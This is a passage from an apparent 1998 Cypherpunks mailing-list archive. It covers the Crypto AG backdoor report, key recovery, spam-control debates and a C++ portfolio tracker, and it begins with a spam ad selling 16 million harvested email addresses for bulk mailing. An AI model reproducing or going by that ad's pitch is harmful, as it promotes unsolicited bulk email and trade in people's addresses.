sample of addresses from any list.   We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We did not clean  these, but we did create
3 seperate files named cyber1.txt, cyber2.txt, & cyber3.txt of 100,000
addresses each. This will give all people that use the list a opportunity to
send mail to the list before deciding if their CD is all it's hyped to be.

We also included a 2+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 100,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
 
AND
 
the a sampling of CyberPromo's HOT list.

>>> NOW ONLY $149.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere..PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              908-245-1143

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax and Mail.
 
 _________________
EZ Order Form
 
 
 _____Yes! I would like to order MILLIONS Vol. 1 email addresses
for only $149.00.
 
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-908-245-3119
 
CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-908-245-3119

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-908-245-3119
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail,
please send all forms and Check or Money Order to:
 
JKP Enterprises
700 Boulevard 
Suite 102
Kenilworth, NJ 07033






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Date: Sun, 22 Feb 1998 20:41:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: CIA Blasts Bay of Pigs Op
In-Reply-To: <199802230348.UAA17099@pophost.com>
Message-ID: <Pine.GSO.3.93.980222234036.6581C-100000@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Central Intelligence is now portraying itself as a bungling and hopelessly
> harmless bureaucracy.
> Sure.
> -- Richard Fiero

Is this something new?

-Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MegaLeads@aol.com
Date: Sun, 22 Feb 1998 23:39:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: request for remailler services
Message-ID: <58eeb372.34f12773@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


please send any info you can to megaleads@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 23 Feb 1998 08:17:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: A virtual Swiss bank for the rest of us, from Time/Netly News
Message-ID: <Pine.GSO.3.95.980223081633.13180E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Sicherheit und Privat will be issuing digital cash, digital letters of
credit, and use a secret-sharing crypto app on a Pilot to handle stock
trading. A bunch of cypherpunk regulars, including Black Unicorn, are
involved.

Below is my writeup that's in this week's Time magazine. For details check
out my article in today's Netly News:

  http://cgi.pathfinder.com/netly/opinion/0,1042,1756,00.html

-Declan

****

A VIRTUAL SWISS BANK FOR THE REST OF US

Time Magazine
March 2, 1998
Page 20

Got the urge for offshore banking but not the cash to try
it? Rather than saving up for a plane ticket to Grand
Cayman, check out a new online bank opening its virtual
doors this week. Sicherheit und Privat (Security and
Privacy) is an Austrian bank that offers encrypted
communications, digital cash transactions and a
privacy-protected MasterCard for a minimum deposit of
$1,000 (as opposed to $10K to $50K in a typical Swiss
bank). Could be just the thing for low rollers trying to
hide cash from a spouse's divorce lawyers--or the IRS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brandon Crosby <bcrosby@mncs.k12.mn.us>
Date: Mon, 23 Feb 1998 09:00:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Is spam really a problem? (fwd)
Message-ID: <199802231704.LAA25326@ted.mncs.k12.mn.us>
MIME-Version: 1.0
Content-Type: text


> 
> >It eats up your valuable time.  You might not see it for what it is, but
> >it is an interruption of normal service.  It's annoying as having your
> >pager go off durring sex and having to call back your boss instead of
> >ignoring it.  (Presume you can't shut off your pager.)  It takes away
> >from the continuity of life.
> 
> You can't even come up with a valid analogy. Any
> pager I've ever carried could be put in silent mode.
> With email, you decide when to check it, and if you 
> have two brain cells to rub together you can identify
> and kill spam reliably on just the Subject and Sender
> data, without reading it. To reiterate, it takes me
> less time to manually kill spam than to trash the junk
> in my snail mail. Spam is simply Not A Big Problem, and
> much less an irritation than telemarketer calls.
> 

Asside from this, when everyone finally figures out how to MIME encrypt
images, movies, sounds, etc. into their E-Mails, the net will become a
sespool of junk mail w/ 16-bit images that only really use 16 colors,
constantly flowng to and fro in a broth. Try to go to world-famous sites?
Ha! Spam is there, too.

The net can only handle so much, and spam by tradition isn't high on the
list.

> What do you propose?
> 
> >Have every sendmail server use a PK scheme to talk to every other
> >server and authenticate the connection.  Have every sendmail server accept
> >mail only from those whose key is verified.
> 
> Oh boy. Mandatory signing, with registered keys. Great. Why not
> also require people to have their SSN's tattooed on the inside of
> their forearms? That way, if some one is so foolish as to say 
> something you didn't want to hear, you'll know 
> who to sue 'for the theft of your valuable time'.

When this happens, two problems arise:
 (1) people (not to forget Gov) will have a reason to break singing codes
 (2) confidence in the system will make signing fraud a very happy-day
       bussiness.

I would suggest, we all send a bit of spam out, 'accidentally' freeze the net
and show people what can happen. Asside from this personality change, little
can be done to keep people from sending spam (or, for that matter, pesonal
letters).
-Brandon Crosby




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mf@mediafilter.org (MediaFilter)
Date: Mon, 23 Feb 1998 08:12:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: CryptoGate, from CAQ
Message-ID: <1323889970-327546@mediafilter.org>
MIME-Version: 1.0
Content-Type: text/plain


            Crypto AG: The NSA's Trojan Whore?

                    by Wayne Madsen

        FOR AT LEAST HALF A CENTURY, THE US HAS BEEN
         INTERCEPTING AND DECRYPTING THE TOP SECRET
        DOCUMENTS OF MOST OF THE WORLD'S GOVERNMENTS

      It may be the greatest intelligence scam of
      the century: For decades, the US has routinely
      intercepted and deciphered top secret
      encrypted messages of 120 countries. These
      nations had bought the world's most
      sophisticated and supposedly secure
      commercial encryption technology from
      Crypto AG, a Swiss company that staked its
      reputation and the security concerns of its
      clients on its neutrality. The purchasing
      nations, confident that their communications
      were protected, sent messages from their
      capitals to embassies, military missions, trade
      offices, and espionage dens around the world,
      via telex, radio, teletype, and facsimile. They
      not only conducted sensitive albeit legal
      business and diplomacy, but sometimes
      strayed into criminal matters, issuing orders
      to assassinate political leaders, bomb
      commercial buildings, and engage in drug and
      arms smuggling. All the while, because of a
      secret agreement between the National
      Security Agency (NSA) and Crypto AG, they might as
      well have been hand delivering the message to Washington.

      Their Crypto AG machines had been rigged so that when
      customers used them, the random encryption key
      could be automatically and clandestinely
      transmitted with the enciphered message. NSA
      analysts could read the message traffic as easily
      as they could the morning newspaper.

      [...]


>From CAQ #63 http://caq.com/cryptogate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Orrin" <sorrin@syndata.com>
Date: Mon, 23 Feb 1998 08:40:29 -0800 (PST)
To: "Bruce Schneier" <schneier@counterpane.com>
Subject: FYI!!!! - NETA to buy TIS
Message-ID: <19980223164221625.AAA314.388@Satan.syndata.domain>
MIME-Version: 1.0
Content-Type: text/plain


Hot off the Press:

http://biz.yahoo.com/snp/980223/tisx_dtp_m_1.html


Monday February 23, 10:21 am Eastern Time

Trusted Information Systems to Be Acquired by Network Associates

TRUSTED INFORMATION SYSTEMS INC. Signs Definitive Agreement to Be Acquired
by
Network Associates Inc.

Feb. 23, 1998, Network Associates Inc. (Nasdaq:NETA - news) and Trusted
Information Systems Inc. (Nasdaq:TISX -
news) said they signed a definitive agreement under which NETA will acquire
TISX in a transaction valued at over
$300,000,000.

Each TISX share will be exchanged for 0.323 of a NETA share.

Subject to approval by TISX stockholders, among other conditions, the
transaction is expected to close within about 90 days. 




A Picture Tells A Thousand Words.
                    STEGO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sal Denaro <sal@panix.com>
Date: Mon, 23 Feb 1998 09:51:25 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: FCPUNX:'close to the machine'
In-Reply-To: <199802192206.RAA15832@anon7.pfmc.net>
Message-ID: <Pine.SUN.3.94.980223122738.19055D-100000@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Feb 1998, Vladimir Z. Nuri wrote:
> fun new book: "close to the machine" by Ellen Ullman. anybody
> here seen/read it? a highly
> personal and emotional book at times about working in the computer 
> industry.  author is a software engineer whose done a lot of contract
> work. I think many here will find it worth a look and/or worth

I read it. After a while I noticed that I had a lot in common with
the young programmer that she had an affair with. 

It took a while to come to terms with being a "type" :)

There were two things about the book that I disliked:

1) Macho-computing. A number of consultants tend to act as if they are
   sliting the atom or landing a man on the moon as they work. While I
   agree that programming is hard work, and that a lot of what programmers
   do is on the edge, it is hardly ground breaking to implement YA DBMS,
   even if it is Java based and web-centric.

2) I think she was tring to hard to look technical.  

--
sal@panix.com                                       Salvatore Denaro
"The reality of the software business today is that if you find
something that can make you ridiculously rich, then that's something
that Microsoft is going to take away from you." -- Max Metral





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Austin Hill <austin@total.net>
Date: Mon, 23 Feb 1998 09:51:43 -0800 (PST)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: FYI!!!! - NETA to buy TIS
Message-ID: <199802231751.MAA20933@bretweir.total.net>
MIME-Version: 1.0
Content-Type: text/plain


<snip>

                    TIS provides a full line of security products and
                    services including: Gauntlet firewalls to protect
                    network connections; Gauntlet Global Virtual Private
                    Networks to secure electronic communications 
worldwide;
                    Stalker misuse detection solutions to ensure the
                    integrity of servers which, when used in conjunction
                    with Network Associates' CyberCop, extends this level 
of
                    protection to networks; and TIS Consulting and 
Training
                    services to facilitate a company's network running
                    smoothly.

                    TIS' RecoverKey encryption technology provides 
flexible,
                    scalable, user-controlled key recovery, and has been
                    implemented by multinational organizations for their
                    global networks. TIS is a founding member of the Key
                    Recovery Alliance, an organization of over 60
                    international companies working together to facilitate
                    the worldwide commercial use of strong encryption.

                    "This announcement represents a fundamental shift in 
the
                    way large customers will implement security 
technology,"
                    said Bill Larson, chairman and CEO of Network
                    Associates. "Network Associates is the first company 
to
                    deliver this caliber of technology and this breadth of
                    security products. The ability to tie all of these
                    components together in a centralized management
                    environment is critical to customer success, and 
Network
                    Associates is the only company to combine security 
with
                    industry-leading network management capabilities."
<snip>

Well I guess this returns Network Associates to the Key Recovery 
Alliance.  I wonder what the PGP division thinks about the new member of 
the family being the founding member of the KRA?

-Austin

Quoted text from Steve Orrin (sorrin@syndata.com ) on 2/23/98 11:46 AM

>Hot off the Press:
>
>http://biz.yahoo.com/snp/980223/tisx_dtp_m_1.html
>
>
>Monday February 23, 10:21 am Eastern Time
>
>Trusted Information Systems to Be Acquired by Network Associates
>
>TRUSTED INFORMATION SYSTEMS INC. Signs Definitive Agreement to Be Acquired
>by
>Network Associates Inc.
>
>Feb. 23, 1998, Network Associates Inc. (Nasdaq:NETA - news) and Trusted
>Information Systems Inc. (Nasdaq:TISX -
>news) said they signed a definitive agreement under which NETA will acquire
>TISX in a transaction valued at over
>$300,000,000.
>
>Each TISX share will be exchanged for 0.323 of a NETA share.
>
>Subject to approval by TISX stockholders, among other conditions, the
>transaction is expected to close within about 90 days. 
>
>
>
>
>A Picture Tells A Thousand Words.
>                    STEGO
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Mon, 23 Feb 1998 10:24:41 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: CryptoGate, from CAQ
Message-ID: <199802231824.NAA08548@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 2/23/98 11:15 AM, MediaFilter (mf@mediafilter.org)  passed this
wisdom:

>   Their Crypto AG machines had been rigged so that when
>   customers used them, the random encryption key
>   could be automatically and clandestinely
>   transmitted with the enciphered message. NSA
>   analysts could read the message traffic as easily
>   as they could the morning newspaper.

 While I feel that, considering its holier than thou attitude, the USG
is acting in a morally reprehensible fashion, these countries got what
they deserve; if they didn't have one of their own on hand, they should
have rented a crypto specialist from "Cypherpunks R Us" (TCM prop) to
check out the equipment/software. If the damned key was passed along
with the ciphertext it seems to me that it should have been easy enough
to tell by creating some known very short text messages ... are they
really that lazy/stupid/trusting?????

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNPG+3z7r4fUXwraZAQF8rAf9HzVd03y+Dgjx8GkmjHxBS7hFW8rRXqZB
0wnVOuYYrSqGGcNTOKDReHBWhPvVnHT9A8DCSYFc1/tjRvFwbtZo6ultwWJDDZ3m
0GwcVg9AK9J/jqrxshjebayzCQOSFZhCnxUZnaFHC6PXx4caKQ3AdEQZ/9Ff64qE
Sdkwu9C2Pq2j3+VdifF6+P0g90JHIqqd0AWLSEuuZJdZBIkPon4JBpwAHHkSpmN4
WdC71lKl8OxJfBapTFTUW4qBitH2PmwA6NIPZ+2SLVfGAOORWEYwHXoLsy8oqeWU
7Hvq6HBC7JngAD3L/ozVVML3dlqnr0i3C7mUd7GwFnVTQo3Qo4Jxpw==
=Ijtu
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "Sometimes it is said that man cannot be trusted with the government
  of himself.  Can he, then, be trusted with the government of others?
  Or have we found angels in the forms of kings to govern him?  Let
  history answer this question."  Thomas Jefferson, 1st Inaugural Addr






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "ANDROCK" <ANDROCK@geocities.com>
Date: Sun, 22 Feb 1998 13:40:17 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Hello
Message-ID: <01bd4060$ce1d80c0$03dfdfdf@tower200>
MIME-Version: 1.0
Content-Type: text/plain




Please, include me in the list
ANDROCK


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Orrin" <sorrin@syndata.com>
Date: Mon, 23 Feb 1998 11:01:29 -0800 (PST)
To: "cypherpunks toad" <cypherpunks@algebra.com>
Subject: PGP's Response
Message-ID: <19980223190148109.AAA317.313@Satan.syndata.domain>
MIME-Version: 1.0
Content-Type: text/plain


The following is PGP's official response (from there web site) to the TIS
acquisition by NETA. What it infers is that while PGP for Personal use
won't (at least until NETA decides otherwise) incorporate TIS technology,
it leaves the door wide open for PGP for Business use....

Network Associates and Key Recovery

With the acquisition of Trusted Information Systems (TIS) by
Network Associates, NAI has added a new technology to its product
portfolio -- key recovery. This TIS-developed technology
addresses the market needs for encryption key recovery and
management. NAI will continue to provide this technology to the
market.

NAI's PGP product group already provides the capability for
corporations to recover information from PGP products deployed in
corporate environments. The requirement for this capability from
corporations has been evident and well-known for quite sometime. 

However, NAI does not believe there is a need for key recovery in
PGP products for the individual. NAI will develop and market
products that its customers need and want but will not include
any technology that is not required by its customers.






A Picture Tells A Thousand Words.
                    STEGO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 23 Feb 1998 07:47:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Is spam really a problem?
Message-ID: <199802231547.QAA29528@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi!

'Masque' here again. The same one who wrote the
original 'Is spam really a problem?' post. (I
won't attempt to prove that :-).

I'm really astounded at "sunder's" PK based 
solution; it's akin to proposing decapitation
as a cure for pimples.

>It eats up your valuable time.  You might not see it for what it is, but
>it is an interruption of normal service.  It's annoying as having your
>pager go off durring sex and having to call back your boss instead of
>ignoring it.  (Presume you can't shut off your pager.)  It takes away
>from the continuity of life.

You can't even come up with a valid analogy. Any
pager I've ever carried could be put in silent mode.
With email, you decide when to check it, and if you 
have two brain cells to rub together you can identify
and kill spam reliably on just the Subject and Sender
data, without reading it. To reiterate, it takes me
less time to manually kill spam than to trash the junk
in my snail mail. Spam is simply Not A Big Problem, and
much less an irritation than telemarketer calls.

What do you propose?

>Have every sendmail server use a PK scheme to talk to every other
>server and authenticate the connection.  Have every sendmail server accept
>mail only from those whose key is verified.

Oh boy. Mandatory signing, with registered keys. Great. Why not
also require people to have their SSN's tattooed on the inside of
their forearms? That way, if some one is so foolish as to say 
something you didn't want to hear, you'll know 
who to sue 'for the theft of your valuable time'.

You're doing the Surveilance State's work for it.  
People who whine 'there oughta be a law' 
everytime anything in life goes against their 
expectations are helping build Big Brother. 
This is called 'being a Useful Idiot'.

>Further, some of us use ISDN to get their email and transferring the
>extra junk adds to the pay/minute connections.

So the rest of the world should give up privacy and anonymity to
fix your poor choice of service provider? You made your bed; now
lie in it.

sunder: get a grip. Coercive legislation is simply not the
appropriate solution for such a minor problem as spam.

guy@panix.com writes:
>Why are you asking the cypherpunks list?

Because I'm active on the list, and I spend more
time here skipping messages about spam than
I do killing actual spam.

Masque.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: celeste@seeme.net
Date: Mon, 23 Feb 1998 17:57:49 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Valentine Suprise
Message-ID: <36591454_72901966>
MIME-Version: 1.0
Content-Type: text/plain



Me and my friends are so lonely!! 
I wish that you would come and see me. 
With Valentines day coming I don't want to be alone. 
I will do anything to make you happy, 
if you want me to I'll even invite a friend over to join us.  
Just PLEASE don't let me be alone!  
I'll be awaiting for you every night.
I'll be at: http://www.cyber-fantasy.com/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Mon, 23 Feb 1998 16:24:09 -0800 (PST)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Five industry giants propose encryption plan to protect Hollywood
In-Reply-To: <199802210056.TAA07362@users.invweb.net>
Message-ID: <34F21246.7B6B00A8@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh please.  You could always (for computers anyway) write your own drivers for
video cards and sound cards that not only display stuff, but also save it to
a hard drive as it's being recieved.  Whoop!

 >   >   Date: Thu, 19 Feb 1998 11:13:50 -0800 (PST)
> >   >   From: William Knowles <erehwon@dis.org>
> >   >
> >   >   BURBANK, Calif. (February 19, 1998 09:06 a.m. EST
> >   >   http://www.nando.net) -- Five computer and electronics industry
> >giants
> >   >   have agreed on a strategy to prevent people from illegally copying
> >   >   digital movies and music, the Los Angeles Times reported Thursday.
> >   >
> >   >   According to the proposal, high-definition TV sets, personal

> Well I have gone over this in previous posts that right's management
> woun't work against the bootlegers as at some time you have to display the
> raw data to the user. what it will to is make things that much harder for
> the average user.

Exactly, it will probably require the average user to get involved in weird
type in the 5th word of the 6th paragraph on page 60 in volume 6 of your 
book and your ssn and your 3rd daughter's birth hour to display.  But once
displayed... it's yours.  Shit, things like Lotus ScreenCam can grab anything
displayed on screen.


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sunder <sunder@brainlink.com>
Date: Mon, 23 Feb 1998 16:49:12 -0800 (PST)
To: Information Security <guy@panix.com>
Subject: Re: PK & Re: Is spam really a problem?
In-Reply-To: <199802200602.BAA18990@panix2.panix.com>
Message-ID: <34F21824.8FFA08B3@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Information Security wrote:

>    >
>    >   Until someone else gets a throw away $10 account and uses it to
>    >   spam, right?  By the time you track'em down, they already gave up
>    >   that account.  All ISP's do is to delete the spamming account, which
>    >   the spammer doesn't care about anyway.  So you achive nothing.
> 
> Talk about achieving nothing: what does server-to-server authentication
> have to do with overcoming spam from throw-away accounts?

Gives you a way of tracing the spammer and avoiding forged headers.
 
> Hey, at least ISPs are making money from terminating accounts. ;-)

Hey, ISP's do suffer damage from spammers.   If they let too many spammers on,
they'll get black listed and none of their users will be able to send mail to
some sites that chose to drop all mail from spam supporting ISP's.  This way
it's an incentive for them to drop spammers.

> And how would throw-away accounts be affected by your proposed
> massive change in SMTP protocol?

There being a contract between the ISP and the throw away account requiring
the payment of damages caused, it would provide teeth to prevent spamming.  If
spamming occurs, the spammer gets to pay for their advertising.  Right now,
spamming is relatively free for the advertiser.
 
> But these keys must be registered somewhere: whether it's at a centralized
> site or distributed, *requiring* everyone to have a digital signature for
> Internet access is twisting this elegant crypto-related technology: to
> number each and every one of us, and is exactly what will make CDA legal,
> because as soon as it's in place attributes such as "age" will be attached.

No, there is no need for a central server.  It's more than enough to require
the user to gen keys of a certain minimal length.  This takes CPU time to do
and enough so to prevent spamming.  If they use the same keys, the servers
will recognize and count the total, thus limiting them to a fixed number of
posts.
 
> Required identity repositories are a bad idea.

None are needed.  Just valid public keys linked to the IP of the incoming
messages.
i.e. a public key along with the ip the shit comes from signed with the private
key
is enough.  If the ip doesn't match the connection IP, the connection gets
dropped.
The fact that there's a public key means that the receiver server can track ip
to 
keys.  Maybe throwing a secured form of identd might help as well.
 
> What, you want _me_ to solve the UCE problem?
> 
> Okay.

Erm, if you chose to, have fun doing it.  These are suggestions for a 
cryptographic solution as opposed to a congressional fuck you up the ass
and kill your rights solution.

> I think if Brad (EFF Director) Templeton's whitelist system were
> made available at the firewall/enterprise level, then widely
> deployed, spam would be dead.

Sounds good to me, except that it's a huge pain for the senders to send
any messaage to anyone.
 
> It's a handy little bot-reply mechanism that asks unknown authors
> to verify they aren't sending UCE, else face a monetary penalty.
 
> The most important part of this design is that it requires
> no control-freak changes to the Internet.

As does my scheme.

> Don't suggest solutions that *require* digital signatures of everyone.

Pushing crypto over legislation is worthwhile in any case, and pushes
towards anonymous reputation capital systems.

> This might work too:
> 
> Throttle email going through the ISP's mailserver.
> 
> Maybe 5/minute limit, flagging attempts to go faster to the admins.

With a count of users.  If Dick Spammer is spamming someone he doesn't
much give a shit about 5 minute delays.  It only prevents massive massive
spams.  As long as the sysadmins don't notice you can send a fuckload of
mail even with 5min delays.
 
> As for direct PPP connectivity, upgrade router software to throttle.
> (Port SMTP traffic)

Yep.

> Certain people, at the ISP's choice, would have a higher limit,
> for mailing lists and such.
> ---guy

Yep.
 
>    Think.

Erm, Think Different.  (I always did prefer Apple over IBM.)

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 23 Feb 1998 20:25:00 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: return.C -- performance tracking tool (fwd)
Message-ID: <199802240424.WAA21282@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



I have been using this program for a while and decided to share it
with the other readers. It is written in C++.

/***********************************************************************

This program calculates the total portfolio return.  It may be used
to find out an individual's stock picking performance and compare it
to some benchmark.

Right now it compiles under Unix, but I would expect it to work under
DOS and Win32 console interface. To compile it, type

	gcc -lm -lg++ -o return return.C

This program was written because I was not satisfied with the existing
portfolio tracking websites due to their extremely limited and incorrect
functionality.

It works by treating your investments as a "mutual fund". It tracks
the number of "shares" held. It means that additional cash infusions,
withdrawals, stock splits, sales of securities do not affect the per share
value. This is done so that the changing size of the portfolio would not
skew the estimate of the true performance of the stock picker. However,
dividends, fees and recorded capital appreciation do affect the per
share value.

Short sales are allowed by specifying a negative stock amount.

I strongly suggest that investors regularly record stock prices into their
transaction files (using the VAL operator) to monitor how they are doing.

USAGE:

	portfolio-return transaction-file-name TICKER=price TICKER=price ...

EXAMPLE

	portfolio-return MYSTOCKS.TXT MSFT=130 T=65.56

It reads a text file that contains the record of transactions, and 
prices, and requests to print out the portfolio value.

# This is a typical file used to calculate total return.
# This file contains comments, marked by "#" characters,
# and transaction info.
#
# Transaction info consists of records of the following form:
#
# INV Amount                    -- tells how much was invested in Category
# PUR Ticker numshares share_price   -- stock purchase info
# SAL Ticker numshares share_price   -- stock sale
# DIV Ticker Amount                  -- how much dividend was received
# WDR Amount                         -- cash withdrawal
# VAL Ticker Amount                  -- Value per share
# SPL Ticker new_to_old              -- stock split
# FEE amount                         -- various fees (like margin loan 
#					interest, commission etc)
# (negative FEE means incoming cash, from e.g interest on the cash held
# by the broker)
# PRN Comment                        -- Print portfolio with Comment
#

Happy investing.

Copyright (c) Igor Chudov 1997. 

	ichudov@algebra.com
	http://www.algebra.com/~ichudov

GNU Copyright applies. There is NO WARRANTY WHATSOEVER. By using this
program you agree to indemnify and hold it author harmless from any
liabilities resulting in connection with your use of the program.

You are allowed to copy this program freely provided that the copyright 
notice remains intact.

*/
 
#include <stdio.h>
#include <iostream.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
 
#define Money       double
#define StockTicker char *
#define Date        int
 
class Stock {
public:
   Stock( const StockTicker theTicker,
          int theQuantity = 0,
          Money theValue = 0.0 )
      : Ticker( strdup( theTicker ) ),
        Quantity( theQuantity ),
        Value( theValue )
        {
           // nothing
        }
 
   ~Stock( void ) { delete[] Ticker; }
   void  Purchase( int theQuantity )         { Quantity += theQuantity; }
   int   GetQuantity( void ) const           { return Quantity; };
   void  SetValue( Money theValue )          { Value = theValue; }
   Money GetValue( void ) const              { return Value; }
   const StockTicker GetTicker( void ) const { return Ticker; }
   void  Split( Money factor ) { Quantity *= factor, Value /= factor; }
private:
   Money Value;
   StockTicker Ticker;
   int Quantity;
};
 
typedef Stock * PStock;
 
class Portfolio {
public:
  Portfolio( void );
  ~Portfolio( void );
 
  // What can happen to the portfolios:
  // Add cash to the portfolio
  void Invest( Money Cash );
 
  // Purchase (or sell (even short) if Quantity is negative)
  void Purchase( const StockTicker Ticker, int Quantity, Money Value );
 
  // Dividend received, 1 success, 0 failure
  int Dividend( const StockTicker Ticker, Money DividendPerShare );
 
  // Split, factor is new # of shares to old # of shares, 1 success, 0 failure
  int Split( const StockTicker Ticker, Money factor );
 
  // Withdrawal
  void Withdraw( Money Amount );

  // Fee -- margin interest, commission etc
  void Fee( Money amount );
 
  // Change in Stock valuation
  int Valuation( StockTicker Ticker, Money theValue );
 
  /////////////////////////////
  // Equity = Cash + StockValue
  Money Equity( void ) const;
 
  Money EquityPerShare( void ) const { return Equity()/NumShares; }
 
  int GetNumShares( void ) const { return NumShares; }
 
  void Print( ostream & os, const char * comment = 0 );
 
protected:
 
  void Revaluate( void );
 
  int FindStock( const StockTicker Ticker );
 
private:
 
  Stock ** Stocks;
  int NumberStocks;
  int MaxNumberStocks;
  Money Return;
  Money LastDate;
  Money Cash;
  Money NumShares;
};
 
Portfolio::Portfolio( void )
   : NumberStocks( 0 ),
     MaxNumberStocks( 100 ),
     Cash( 0.0 ),
     NumShares( 0 ),
     Return( 0.0 ),
     LastDate( 0 )
{
   Stocks = new PStock[ MaxNumberStocks ];
}
 
Portfolio::~Portfolio( void )
{
   delete[] Stocks;
}
